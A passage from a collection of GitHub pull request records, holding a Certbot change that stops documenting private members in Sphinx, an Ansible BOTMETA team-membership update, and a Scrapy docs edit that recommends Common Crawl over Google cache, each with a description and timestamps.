+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/letshelp-certbot/docs/conf.py b/letshelp-certbot/docs/conf.py
index fcff25d556f..fc482a3488e 100644
--- a/letshelp-certbot/docs/conf.py
+++ b/letshelp-certbot/docs/conf.py
@@ -40,7 +40,7 @@
]
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/tools/sphinx-quickstart.sh b/tools/sphinx-quickstart.sh
index 72dc9e200ef..35a7f7fad54 100755
--- a/tools/sphinx-quickstart.sh
+++ b/tools/sphinx-quickstart.sh
@@ -14,7 +14,7 @@ sed -i -e "s|\# import os|import os|" conf.py
sed -i -e "s|\# needs_sphinx = '1.0'|needs_sphinx = '1.0'|" conf.py
sed -i -e "s|intersphinx_mapping = {'https://docs.python.org/': None}|intersphinx_mapping = {\n 'python': ('https://docs.python.org/', None),\n 'acme': ('https://acme-python.readthedocs.org/en/latest/', None),\n 'certbot': ('https://certbot.eff.org/docs/', None),\n}|" conf.py
sed -i -e "s|html_theme = 'alabaster'|\n# http://docs.readthedocs.org/en/latest/theme.html#how-do-i-use-this-locally-and-on-read-the-docs\n# on_rtd is whether we are on readthedocs.org\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\nif not on_rtd: # only import and set the theme if we're building docs locally\n import sphinx_rtd_theme\n html_theme = 'sphinx_rtd_theme'\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n# otherwise, readthedocs.org uses their theme by default, so no need to specify it|" conf.py
-sed -i -e "s|# Add any paths that contain templates here, relative to this directory.|autodoc_member_order = 'bysource'\nautodoc_default_flags = ['show-inheritance', 'private-members']\n\n# Add any paths that contain templates here, relative to this directory.|" conf.py
+sed -i -e "s|# Add any paths that contain templates here, relative to this directory.|autodoc_member_order = 'bysource'\nautodoc_default_flags = ['show-inheritance']\n\n# Add any paths that contain templates here, relative to this directory.|" conf.py
sed -i -e "s|# The name of the Pygments (syntax highlighting) style to use.|default_role = 'py:obj'\n\n# The name of the Pygments (syntax highlighting) style to use.|" conf.py
echo "/_build/" >> .gitignore
echo "=================
|
It looks like we're currently documenting functions that are marked private (prefixed with an underscore) such as https://certbot.eff.org/docs/api/certbot.crypto_util.html#certbot.crypto_util._load_cert_or_req. I do not think we should do this because the functionality is private, should not be used, and including it in our docs just adds visual noise.
This PR stops us from documenting private code and fixes up `tools/sphinx-quickstart.sh` so we don't document it in future modules.
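For illustration only (not part of the original PR), with `private-members` dropped from `autodoc_default_flags`, underscore-prefixed helpers in a hypothetical module like the one below would no longer be pulled into the generated API docs:
```python
# hypothetical_module.py -- illustration of the autodoc behaviour change.

def load_cert(path):
    """Public helper: still documented by autodoc."""

def _load_cert_or_req(path):
    """Private (underscore-prefixed) helper: omitted from the generated docs
    once 'private-members' is removed from autodoc_default_flags."""
```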
|
https://api.github.com/repos/certbot/certbot/pulls/7675
|
2020-01-10T19:13:31Z
|
2020-01-11T00:48:02Z
|
2020-01-11T00:48:02Z
|
2020-01-11T00:48:08Z
| 3,142
|
certbot/certbot
| 3,068
|
Add gdpak to networking team
|
diff --git a/.github/BOTMETA.yml b/.github/BOTMETA.yml
index e54bf33cbd5065..ceb29e32bd47b8 100644
--- a/.github/BOTMETA.yml
+++ b/.github/BOTMETA.yml
@@ -486,7 +486,7 @@ files:
$modules/network/illumos/: xen0l
$modules/network/interface/: $team_networking
$modules/network/ios/: privateip rcarrillocruz kedarX
- $modules/network/iosxr/: privateip rcarrillocruz kedarX
+ $modules/network/iosxr/: privateip rcarrillocruz kedarX gdpak
$modules/network/ironware/: paulquack
$modules/network/junos/: Qalthos ganeshrn
$modules/network/layer2/: $team_networking
@@ -1140,12 +1140,12 @@ macros:
team_netapp: hulquest lmprice broncofan gouthampacha
team_netscaler: chiradeep giorgos-nikolopoulos
team_netvisor: Qalthos amitsi gundalow privateip
- team_networking: Qalthos ganeshrn gundalow privateip rcarrillocruz trishnaguha kedarX
+ team_networking: Qalthos ganeshrn gundalow privateip rcarrillocruz trishnaguha kedarX gdpak
team_nso: cmoberg cnasten
team_nxos: mikewiebe privateip rahushen rcarrillocruz trishnaguha kedarX
team_onyx: samerd
team_openstack: emonty j2sol juliakreger rcarrillocruz shrews thingee dagnello
- team_openswitch: Qalthos gundalow privateip
+ team_openswitch: Qalthos gundalow privateip gdpak
team_rabbitmq: chrishoffman manuel-sousa hyperized
team_rhn: alikins barnabycourt flossware vritant
team_tower: ghjm jlaska matburt wwitzel3
|
For notifications on PRs, etc.
|
https://api.github.com/repos/ansible/ansible/pulls/36822
|
2018-02-28T06:44:31Z
|
2018-02-28T06:51:00Z
|
2018-02-28T06:51:00Z
|
2019-04-27T00:17:47Z
| 502
|
ansible/ansible
| 48,858
|
Recommend Common Crawl instead of Google Cache
|
diff --git a/docs/topics/practices.rst b/docs/topics/practices.rst
index 1a9d5614390..d0207fd18c6 100644
--- a/docs/topics/practices.rst
+++ b/docs/topics/practices.rst
@@ -262,7 +262,7 @@ Here are some tips to keep in mind when dealing with these kinds of sites:
* disable cookies (see :setting:`COOKIES_ENABLED`) as some sites may use
cookies to spot bot behaviour
* use download delays (2 or higher). See :setting:`DOWNLOAD_DELAY` setting.
-* if possible, use `Google cache`_ to fetch pages, instead of hitting the sites
+* if possible, use `Common Crawl`_ to fetch pages, instead of hitting the sites
directly
* use a pool of rotating IPs. For example, the free `Tor project`_ or paid
services like `ProxyMesh`_. An open source alternative is `scrapoxy`_, a
@@ -277,7 +277,7 @@ If you are still unable to prevent your bot getting banned, consider contacting
.. _Tor project: https://www.torproject.org/
.. _commercial support: https://scrapy.org/support/
.. _ProxyMesh: https://proxymesh.com/
-.. _Google cache: http://www.googleguide.com/cached_pages.html
+.. _Common Crawl: https://commoncrawl.org/
.. _testspiders: https://github.com/scrapinghub/testspiders
.. _scrapoxy: https://scrapoxy.io/
.. _Zyte Smart Proxy Manager: https://www.zyte.com/smart-proxy-manager/
|
Closes #3582
The terms of use allow scraping as long as Scrapy honours the restrictions of robots.txt files and NOFOLLOW meta tags.
Common Crawl terms of use: https://commoncrawl.org/terms-of-use/
|
https://api.github.com/repos/scrapy/scrapy/pulls/5432
|
2022-03-01T21:10:37Z
|
2022-03-11T15:05:43Z
|
2022-03-11T15:05:43Z
|
2022-03-11T15:05:43Z
| 359
|
scrapy/scrapy
| 34,899
|